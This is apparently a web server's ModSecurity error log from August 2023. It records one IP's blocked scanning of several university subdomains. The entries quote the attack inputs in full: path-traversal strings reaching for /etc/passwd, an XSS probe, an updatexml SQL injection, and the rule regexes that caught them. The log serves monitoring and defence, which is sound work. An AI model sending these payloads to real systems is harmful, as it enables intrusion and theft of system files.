[Tue Aug 29 11:46:09.433588 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:SEARCH. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:SEARCH: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAfEB6AAAAAO"]
[Tue Aug 29 11:46:09.456574 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhtji4AAAAq"]
[Tue Aug 29 11:46:09.478240 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhlz-gAAAAi"]
[Tue Aug 29 11:46:09.515326 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAfEB6QAAAAO"]
[Tue Aug 29 11:46:09.515651 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAhlz-oAAAAi"]
[Tue Aug 29 11:46:09.516241 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAipS5cAAAAF"]
[Tue Aug 29 11:46:09.528118 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAib5y0AAAAA"]
[Tue Aug 29 11:46:09.537060 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAi5uDcAAAAS"]
[Tue Aug 29 11:46:09.555817 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAfEB6YAAAAO"]
[Tue Aug 29 11:46:09.563100 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAipS5kAAAAF"]
[Tue Aug 29 11:46:09.566415 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EcCo-f0AAAib5y8AAAAA"]
[Tue Aug 29 11:46:10.363238 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EsCo-f0AAAdxUp4AAAAC"]
[Tue Aug 29 11:46:10.436817 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:content: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO14EsCo-f0AAAhZRlUAAAAG"]
[Tue Aug 29 11:46:12.386993 2023] [:error] [pid 1988] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAfEB7YAAAAO"]
[Tue Aug 29 11:46:12.389251 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi2yCEAAAAN"]
[Tue Aug 29 11:46:12.424798 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi5uEAAAAAS"]
[Tue Aug 29 11:46:12.452590 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAdxUqkAAAAC"]
[Tue Aug 29 11:46:12.490431 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAib5z0AAAAA"]
[Tue Aug 29 11:46:12.563479 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FMCo-f0AAAi5uEUAAAAS"]
[Tue Aug 29 11:46:12.566083 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAdxUqwAAAAC"]
[Tue Aug 29 11:46:12.570965 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAib50AAAAAA"]
[Tue Aug 29 11:46:12.573328 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FMCo-f0AAAi-Q-YAAAAH"]
[Tue Aug 29 11:46:13.372176 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAi-Q-gAAAAH"]
[Tue Aug 29 11:46:13.380243 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAhzvhoAAAAx"]
[Tue Aug 29 11:46:13.393035 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAi-Q-kAAAAH"]
[Tue Aug 29 11:46:13.395090 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAhtjjoAAAAq"]
[Tue Aug 29 11:46:13.406447 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAdxUq8AAAAC"]
[Tue Aug 29 11:46:13.415790 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAipS6UAAAAF"]
[Tue Aug 29 11:46:13.420894 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAhzvhwAAAAx"]
[Tue Aug 29 11:46:13.422069 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:file: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/glpi/plugins/barcode/front/send.php"] [unique_id "ZO14FcCo-f0AAAhl0AoAAAAi"]
[Tue Aug 29 11:46:13.428941 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filename. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filename: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhrqPkAAAAo"]
[Tue Aug 29 11:46:13.431945 2023] [:error] [pid 2239] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAi-Q-sAAAAH"]
[Tue Aug 29 11:46:13.452356 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:field. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:field: updatexml(1,version(),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/api/get-organizations"] [unique_id "ZO14FcCo-f0AAAhrqPoAAAAo"]
[Tue Aug 29 11:46:13.463252 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhzvh4AAAAx"]
[Tue Aug 29 11:46:13.472387 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhrqPsAAAAo"]
[Tue Aug 29 11:46:13.472920 2023] [:error] [pid 2157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAhtjj4AAAAq"]
[Tue Aug 29 11:46:13.475012 2023] [:error] [pid 2228] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:filepath: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/ipecs-cm/download"] [unique_id "ZO14FcCo-f0AAAi0JJ8AAAAK"]
[Tue Aug 29 11:46:13.483666 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:path: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/file"] [unique_id "ZO14FcCo-f0AAAhzvh8AAAAx"]
